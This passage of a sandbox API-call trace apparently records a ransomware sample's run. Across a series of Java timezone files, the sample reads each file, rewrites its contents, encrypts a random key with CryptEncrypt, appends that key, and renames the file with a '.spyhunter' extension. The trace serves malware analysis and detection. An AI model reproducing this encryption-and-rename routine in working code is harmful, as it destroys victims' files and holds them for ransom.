dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.001] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo") returned 67 [0171.001] StrStrW (lpFirst="Marengo", lpSrch=".txt") returned 0x0 [0171.001] GetProcessHeap () returned 0x2c0000 [0171.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.001] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e56c*=0x384, lpOverlapped=0x0) returned 1 [0171.146] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffc7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.146] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x384, lpNumberOfBytesWritten=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e56c*=0x384, lpOverlapped=0x0) returned 1 [0171.147] GetProcessHeap () returned 0x2c0000 [0171.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.147] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.147] WriteFile (in: hFile=0x9c, lpBuffer=0x270e5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x270e5ac*, lpNumberOfBytesWritten=0x270e56c*=0x4, lpOverlapped=0x0) returned 1 [0171.147] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e56c*=0x30, lpOverlapped=0x0) returned 1 [0171.147] CloseHandle (hObject=0x9c) returned 1 [0171.147] GetProcessHeap () returned 0x2c0000 [0171.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.147] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo.spyhunter") returned 77 [0171.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo.spyhunter")) returned 1 [0171.149] GetProcessHeap () returned 0x2c0000 [0171.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.149] GetProcessHeap () returned 0x2c0000 [0171.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.149] GetProcessHeap () returned 0x2c0000 [0171.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e046b8 | out: hHeap=0x2c0000) returned 1 [0171.149] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5b0 | out: pbBuffer=0x270e5b0) returned 1 [0171.149] GetProcessHeap () returned 0x2c0000 [0171.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5a8*=0x30) returned 1 [0171.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.150] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax") returned 59 [0171.150] StrStrW (lpFirst="Halifax", lpSrch=".txt") returned 0x0 [0171.150] GetProcessHeap () returned 0x2c0000 [0171.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.150] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e56c*=0x774, lpOverlapped=0x0) returned 1 [0171.200] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff88c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.200] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x774, lpNumberOfBytesWritten=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e56c*=0x774, lpOverlapped=0x0) returned 1 [0171.200] GetProcessHeap () returned 0x2c0000 [0171.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.201] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.201] WriteFile (in: hFile=0x9c, lpBuffer=0x270e5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x270e5ac*, lpNumberOfBytesWritten=0x270e56c*=0x4, lpOverlapped=0x0) returned 1 [0171.201] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e56c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e56c*=0x30, lpOverlapped=0x0) returned 1 [0171.201] CloseHandle (hObject=0x9c) returned 1 [0171.201] GetProcessHeap () returned 0x2c0000 [0171.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.201] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax.spyhunter") returned 69 [0171.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax.spyhunter")) returned 1 [0171.202] GetProcessHeap () returned 0x2c0000 [0171.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.202] GetProcessHeap () returned 0x2c0000 [0171.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.202] GetProcessHeap () returned 0x2c0000 [0171.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8800 | out: hHeap=0x2c0000) returned 1 [0171.202] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5a8 | out: pbBuffer=0x270e5a8) returned 1 [0171.202] GetProcessHeap () returned 0x2c0000 [0171.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5a0*=0x30) returned 1 [0171.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.203] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana") returned 58 [0171.203] StrStrW (lpFirst="Guyana", lpSrch=".txt") returned 0x0 [0171.203] GetProcessHeap () returned 0x2c0000 [0171.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.203] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e564*=0x59, lpOverlapped=0x0) returned 1 [0171.204] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.204] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e564*=0x59, lpOverlapped=0x0) returned 1 [0171.204] GetProcessHeap () returned 0x2c0000 [0171.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.204] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.205] WriteFile (in: hFile=0x9c, lpBuffer=0x270e5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x270e5a4*, lpNumberOfBytesWritten=0x270e564*=0x4, lpOverlapped=0x0) returned 1 [0171.205] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e564*=0x30, lpOverlapped=0x0) returned 1 [0171.205] CloseHandle (hObject=0x9c) returned 1 [0171.205] GetProcessHeap () returned 0x2c0000 [0171.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.205] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana.spyhunter") returned 68 [0171.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana.spyhunter")) returned 1 [0171.206] GetProcessHeap () returned 0x2c0000 [0171.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.206] GetProcessHeap () returned 0x2c0000 [0171.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.206] GetProcessHeap () returned 0x2c0000 [0171.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8740 | out: hHeap=0x2c0000) returned 1 [0171.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5a8 | out: pbBuffer=0x270e5a8) returned 1 [0171.206] GetProcessHeap () returned 0x2c0000 [0171.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5a0*=0x30) returned 1 [0171.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.207] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil") returned 61 [0171.207] StrStrW (lpFirst="Guayaquil", lpSrch=".txt") returned 0x0 [0171.207] GetProcessHeap () returned 0x2c0000 [0171.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.207] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e564*=0x41, lpOverlapped=0x0) returned 1 [0171.208] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.208] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e564*=0x41, lpOverlapped=0x0) returned 1 [0171.208] GetProcessHeap () returned 0x2c0000 [0171.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.208] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.208] WriteFile (in: hFile=0x9c, lpBuffer=0x270e5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x270e5a4*, lpNumberOfBytesWritten=0x270e564*=0x4, lpOverlapped=0x0) returned 1 [0171.208] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e564*=0x30, lpOverlapped=0x0) returned 1 [0171.208] CloseHandle (hObject=0x9c) returned 1 [0171.208] GetProcessHeap () returned 0x2c0000 [0171.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.208] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil.spyhunter") returned 71 [0171.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil.spyhunter")) returned 1 [0171.209] GetProcessHeap () returned 0x2c0000 [0171.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.209] GetProcessHeap () returned 0x2c0000 [0171.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.209] GetProcessHeap () returned 0x2c0000 [0171.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed44e8 | out: hHeap=0x2c0000) returned 1 [0171.209] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5a0 | out: pbBuffer=0x270e5a0) returned 1 [0171.209] GetProcessHeap () returned 0x2c0000 [0171.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.210] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e598*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e598*=0x30) returned 1 [0171.210] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.210] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala") returned 61 [0171.210] StrStrW (lpFirst="Guatemala", lpSrch=".txt") returned 0x0 [0171.210] GetProcessHeap () returned 0x2c0000 [0171.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.210] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e55c*=0x89, lpOverlapped=0x0) returned 1 [0171.211] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.211] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e55c*=0x89, lpOverlapped=0x0) returned 1 [0171.211] GetProcessHeap () returned 0x2c0000 [0171.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.211] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.211] WriteFile (in: hFile=0x9c, lpBuffer=0x270e59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x270e59c*, lpNumberOfBytesWritten=0x270e55c*=0x4, lpOverlapped=0x0) returned 1 [0171.211] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e55c*=0x30, lpOverlapped=0x0) returned 1 [0171.212] CloseHandle (hObject=0x9c) returned 1 [0171.212] GetProcessHeap () returned 0x2c0000 [0171.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.212] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala.spyhunter") returned 71 [0171.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala.spyhunter")) returned 1 [0171.212] GetProcessHeap () returned 0x2c0000 [0171.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.213] GetProcessHeap () returned 0x2c0000 [0171.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.213] GetProcessHeap () returned 0x2c0000 [0171.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4420 | out: hHeap=0x2c0000) returned 1 [0171.213] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5a0 | out: pbBuffer=0x270e5a0) returned 1 [0171.213] GetProcessHeap () returned 0x2c0000 [0171.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e598*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e598*=0x30) returned 1 [0171.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.213] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe") returned 62 [0171.213] StrStrW (lpFirst="Guadeloupe", lpSrch=".txt") returned 0x0 [0171.214] GetProcessHeap () returned 0x2c0000 [0171.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.214] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e55c*=0x41, lpOverlapped=0x0) returned 1 [0171.215] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.215] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e55c*=0x41, lpOverlapped=0x0) returned 1 [0171.215] GetProcessHeap () returned 0x2c0000 [0171.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.216] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.216] WriteFile (in: hFile=0x9c, lpBuffer=0x270e59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x270e59c*, lpNumberOfBytesWritten=0x270e55c*=0x4, lpOverlapped=0x0) returned 1 [0171.216] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e55c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e55c*=0x30, lpOverlapped=0x0) returned 1 [0171.216] CloseHandle (hObject=0x9c) returned 1 [0171.223] GetProcessHeap () returned 0x2c0000 [0171.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.223] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe.spyhunter") returned 72 [0171.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe.spyhunter")) returned 1 [0171.224] GetProcessHeap () returned 0x2c0000 [0171.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.224] GetProcessHeap () returned 0x2c0000 [0171.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.224] GetProcessHeap () returned 0x2c0000 [0171.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4358 | out: hHeap=0x2c0000) returned 1 [0171.224] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e598 | out: pbBuffer=0x270e598) returned 1 [0171.224] GetProcessHeap () returned 0x2c0000 [0171.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.225] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e590*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e590*=0x30) returned 1 [0171.225] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.226] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada") returned 59 [0171.226] StrStrW (lpFirst="Grenada", lpSrch=".txt") returned 0x0 [0171.226] GetProcessHeap () returned 0x2c0000 [0171.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.226] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e554*=0x41, lpOverlapped=0x0) returned 1 [0171.227] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.227] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e554*=0x41, lpOverlapped=0x0) returned 1 [0171.227] GetProcessHeap () returned 0x2c0000 [0171.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.227] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.227] WriteFile (in: hFile=0x9c, lpBuffer=0x270e594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x270e594*, lpNumberOfBytesWritten=0x270e554*=0x4, lpOverlapped=0x0) returned 1 [0171.227] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e554*=0x30, lpOverlapped=0x0) returned 1 [0171.227] CloseHandle 